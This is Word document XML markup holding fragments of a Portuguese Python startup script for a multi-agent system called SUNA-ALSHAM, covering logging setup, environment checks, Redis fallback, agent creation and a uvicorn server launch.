      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏗️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Arquitetura: Modular com WebSocket + Event System")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2379B0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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚡</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Modo Acelera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o: ATIVO - Ciclos autom</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ticos")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6D1F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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏆</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Contador Real: Todos os ciclos contabilizados")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B58FE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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>💎</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valor Total: R$ 1.430.000")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70325F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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✨</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Dashboard: Integrado COM CONTADOR DE CICLOS CORRIGIDO")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578F10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print("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Features: WebSocket, Event Log, Contador Real, HTTP Fallback")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2681853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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Dashboard: /dashboard (SEM redirecionamento externo)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E05A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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📱</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Mobile PWA: /mobile (Versão otimizada para celular)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EBCB7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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔥</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CONTADOR DE CICLOS: Funcionando em tempo real COM CORREÇÕES")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE867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print("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CORREÇÕES: URL WebSocket, Serialização datetime, HTTP Fallback")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CF9FC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5C30A4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uvicorn.run(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5121BB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app,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160FC6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host="0.0.0.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762E56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port=port,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABBAAB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log_level="info"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C67A6C" w14:textId="083F8F88" w:rsid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)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BF451E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFCE2DF" w14:textId="302295E6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main_complete_system.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044124D3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌟</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SUNA-ALSHAM Multi-Agent System v2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E68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Sistema multi-agente com capacidades de IA avançada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596CCD85" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1556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CORREÇÕES IMPLEMENTADAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539C08BB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Removido AnalyticsAgent inexistente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2407E273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Corrigidas todas as importações</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D871A8F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Logs detalhados para debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2312D66A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Funciona com/sem Redis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B85AA7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Tratamento robusto de erros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7A90B5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Inicialização dos 7 agentes especializados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0E5A01" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pP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Adicionados 4 novos agentes para maior robustez</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9FA1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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30062346" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768407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asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4232C9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logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316CF36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os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC1D9A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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C7E0D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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0883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import signal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9C1EC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typing import Dict, Any, Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72546C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from datetime import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCD0F1D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C986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Configurar logging avançado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72341B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handlers = [logging.StreamHandler(sys.stdout)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5400068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os.getenv("RAILWAY_ENVIRONMENT") is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2006C2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handlers.append(logging.FileHandler('suna_alsham.log', mode='a'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E64872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logging.basicConfig(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A2C58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level=logging.DEBUG,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7FBE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format='%(asctime)s - %(name)s - %(levelname)s - [%(filename)s:%(lineno)d] - %(message)s',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA8F7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handlers=handlers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EF686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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8527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logger = logging.getLogger(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6257FB97" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="645BBE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Verificar estrutura de arquivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAEBF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logger.info(f"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Executando de: {os.path.abspath(__file__)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E705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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📁</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Diretório atual: {os.getcwd()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B854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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📋</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Arquivos no diretório: {os.listdir()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9C0656" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FAC00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# Verificar variáveis de ambiente críticas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148B322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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔑</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OPENAI_API_KEY configurada: {'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>' if os.getenv('OPENAI_API_KEY') else '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>'}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B10529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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> REDIS_URL configurada: {'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>' if os.getenv('REDIS_URL') else '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>'}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3E5DAC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9C8D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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E808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from suna_alsham.core.multi_agent_network import MultiAgentNetwork</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679F7B8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from suna_alsham.core.specialized_agents import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C52B3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OptimizationAgent, SecurityAgent, LearningAgent, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC1C2D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DataAgent, MonitoringAgent, CollaborationAgent, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135C712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ComplianceAgent, UserExperienceAgent, PredictiveAnalyticsAgent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6C82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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E603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from suna_alsham.core.ai_powered_agents import SelfEvolvingAgent, AIOptimizationAgent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180EDE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logger.info("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Todos os m</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dulos importados com sucesso")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D83BF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except ImportError as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1249AB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na importa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o: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F469B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logger.error("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Verifique se todos os arquivos estão presentes:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CB83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logger.error("   - multi_agent_network.py")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148B9C0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logger.error("   - specialized_agents.py")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEC67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logger.error("   - ai_powered_agents.py")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A50EEE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sys.exit(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9ABBF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486E8F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class EnhancedSystemManager:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54740A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"""Gerenciador avançado do sistema multi-agente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C46DC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4B34B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__init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7749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self.network = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5439AF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self.agents: Dict[str, Any] = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FFEB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self.is_running = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF523F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self.start_time = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16721B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self.shutdown_requested = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A1ED4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09189A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# Configurar handlers de sinal para shutdown graceful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDEB0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signal.signal(signal.SIGINT, self._signal_handler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D23DC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signal.signal(signal.SIGTERM, self._signal_handler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DF76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7ECA015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_signal_handler(self, signum, frame):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A389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"""Handler para sinais de shutdown"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADD0F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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛑</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sinal {signum} recebido, iniciando shutdown graceful...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA356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self.shutdown_requested = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E280C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self.is_running = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21653F2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435733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initialize_system(self) -&gt; bool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5192FFD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"""Inicializa o sistema multi-agente"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6CDD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🌟</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Inicializando sistema SUNA-ALSHAM...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6CEE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13F503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399E8C5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Verificar API key do OpenAI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127B7F9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not os.getenv("OPENAI_API_KEY"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D97E7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logger.error("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OPENAI_API_KEY n</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ã</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o configurada")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D697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logger.error("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Configure a variável de ambiente OPENAI_API_KEY")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436D50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return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BE86E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OPENAI_API_KEY configurada")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F49111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122B29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Verificar Redis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2B47D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redis_url = os.getenv("REDIS_URL")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7670DB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redis_url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AC29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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CA77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import redis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F47FDC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redis_client = redis.from_url(redis_url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E0AE1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redis_client.ping()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21847D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logger.info("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Redis conectado com sucesso")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BE58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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B638A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logger.warning(f"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Falha na conexão com Redis: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B4BD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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Usando cache em memória como fallback")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D736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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5DA1F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logger.warning("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REDIS_URL não configurada - usando cache em memória")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761AB4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989A39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Criar rede multi-agente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30552BB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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Criando rede multi-agente...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7B32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self.network = MultiAgentNetwork()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6752C6F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Rede multi-agente criada")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA903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07F517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Criar todos os agentes especializados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6091B97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self._create_all_agents()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5184315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5766ACA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# Iniciar a rede</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FA63C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logger.info("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Iniciando rede multi-agente...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D28C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self.network.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205F485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self.is_running = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0266FDD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423BD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🎉</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema inicializado com sucesso!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E6B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Total de agentes criados: {len(self.agents)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D696E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⏰</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tempo de inicializa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o: {(datetime.now() - self.start_time).total_seconds():.2f}s")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3068DF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4262B1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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D588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69A9A20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2BBA043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cr</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tico na inicializa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 do sistema: {e}", exc_info=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3FAC3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return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BF4AD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20A8150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_create_all_agents(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3B29A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"""Cria todos os agentes especializados"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B98E0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🤖</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Iniciando criação dos agentes especializados...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048BBDA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FF862B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agents_config = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F03AF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("optimizer_001", OptimizationAgent, "Otimização de performance"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79139F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("security_001", SecurityAgent, "Monitoramento de segurança"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C996E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("learner_001", LearningAgent, "Aprendizado contínuo"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AF0C6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("data_001", DataAgent, "Processamento de dados"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667AFE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("monitor_001", MonitoringAgent, "Monitoramento de sistema"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1772B2A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("evolving_001", SelfEvolvingAgent, "Auto-evolução com IA"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263C01D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("ai_optimizer_001", AIOptimizationAgent, "Otimização com IA"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671F5AC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("collaboration_001", CollaborationAgent, "Coordenação entre agentes"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EACE6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("compliance_001", ComplianceAgent, "Conformidade regulatória"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FC0E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("user_experience_001", UserExperienceAgent, "Otimização da experiência do usuário"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD2FC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("predictive_analytics_001", PredictiveAnalyticsAgent, "Análise preditiva"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DEF2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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F7153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EF5945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successful_agents = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4840F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failed_agents = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F0431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04A34D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for agent_id, agent_class, description in agents_config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D965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🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
